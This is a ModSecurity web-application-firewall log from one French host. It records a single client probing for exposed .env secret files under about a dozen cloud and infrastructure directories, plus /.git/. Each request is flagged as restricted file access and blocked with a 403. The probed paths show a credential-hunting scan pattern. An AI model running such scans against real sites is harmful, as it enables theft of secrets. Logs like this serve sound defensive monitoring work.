[Mon May 11 15:50:19.878812 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bulk/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAwAAAIk"]
[Mon May 11 15:50:19.879313 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAwAAAIk"]
[Mon May 11 15:50:19.879559 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/bulk/.env"] [unique_id "agHem6t2WtvoFr7xvGzdAwAAAIk"]
[Mon May 11 15:50:19.972116 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /aws/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHem6t2WtvoFr7xvGzdBAAAAIk"]
[Mon May 11 15:50:19.972506 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHem6t2WtvoFr7xvGzdBAAAAIk"]
[Mon May 11 15:50:19.972718 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/aws/.env"] [unique_id "agHem6t2WtvoFr7xvGzdBAAAAIk"]
[Mon May 11 15:50:20.065608 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /azure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBQAAAIk"]
[Mon May 11 15:50:20.065981 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBQAAAIk"]
[Mon May 11 15:50:20.066207 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/azure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBQAAAIk"]
[Mon May 11 15:50:20.158307 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gcp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBgAAAIk"]
[Mon May 11 15:50:20.158796 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBgAAAIk"]
[Mon May 11 15:50:20.159037 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gcp/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBgAAAIk"]
[Mon May 11 15:50:20.250465 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cloud/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBwAAAIk"]
[Mon May 11 15:50:20.250871 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBwAAAIk"]
[Mon May 11 15:50:20.251088 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHenKt2WtvoFr7xvGzdBwAAAIk"]
[Mon May 11 15:50:20.342542 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCAAAAIk"]
[Mon May 11 15:50:20.342915 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCAAAAIk"]
[Mon May 11 15:50:20.343110 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCAAAAIk"]
[Mon May 11 15:50:20.435465 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCgAAAIk"]
[Mon May 11 15:50:20.435944 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCgAAAIk"]
[Mon May 11 15:50:20.436205 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCgAAAIk"]
[Mon May 11 15:50:20.529964 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCwAAAIk"]
[Mon May 11 15:50:20.530597 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCwAAAIk"]
[Mon May 11 15:50:20.530843 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHenKt2WtvoFr7xvGzdCwAAAIk"]
[Mon May 11 15:50:20.624337 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDQAAAIk"]
[Mon May 11 15:50:20.624838 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDQAAAIk"]
[Mon May 11 15:50:20.625085 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDQAAAIk"]
[Mon May 11 15:50:20.716811 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDgAAAIk"]
[Mon May 11 15:50:20.717296 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDgAAAIk"]
[Mon May 11 15:50:20.717556 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDgAAAIk"]
[Mon May 11 15:50:20.809178 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDwAAAIk"]
[Mon May 11 15:50:20.809638 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDwAAAIk"]
[Mon May 11 15:50:20.809852 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHenKt2WtvoFr7xvGzdDwAAAIk"]
[Mon May 11 15:50:20.903724 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEAAAAIk"]
[Mon May 11 15:50:20.904150 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEAAAAIk"]
[Mon May 11 15:50:20.904371 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEAAAAIk"]
[Mon May 11 15:50:20.996792 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEQAAAIk"]
[Mon May 11 15:50:20.997295 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEQAAAIk"]
[Mon May 11 15:50:20.997530 2026] [security2:error] [pid 1319998:tid 1320009] [client 54.211.142.83:52058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHenKt2WtvoFr7xvGzdEQAAAIk"]
